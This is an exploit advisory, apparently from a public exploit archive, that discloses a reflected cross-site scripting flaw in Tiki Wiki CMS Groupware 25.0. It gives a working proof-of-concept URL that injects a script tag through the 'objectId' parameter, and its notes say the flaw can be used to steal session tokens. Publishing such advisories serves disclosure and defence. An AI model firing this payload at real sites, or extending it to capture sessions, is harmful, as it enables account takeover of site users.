Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability.
9b64abf86a75127aac800b86c82f3f1dc138c4ad60a01b3fc17f2cbc5edcca03
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : tiki.org │
│ Vendor : Tiki Software Community Association │
│ Software : Tiki Wiki CMS Groupware 25.0 │
│ Vuln Type: Reflected XSS │
│ Method : GET │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
URL parameter 'objectId' is vulnerable to XSS
Path: /25x/tiki-ajax_services.php
https://demo.tiki.org/25x/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=%ec%98%a4%eb%8a%98%ec%9d%98%20%eb%82%a0%ec%94%a8%7d%7dfz6no%3cscript%3ealert(1)%3c%2fscript%3ewwyvb
[-] Done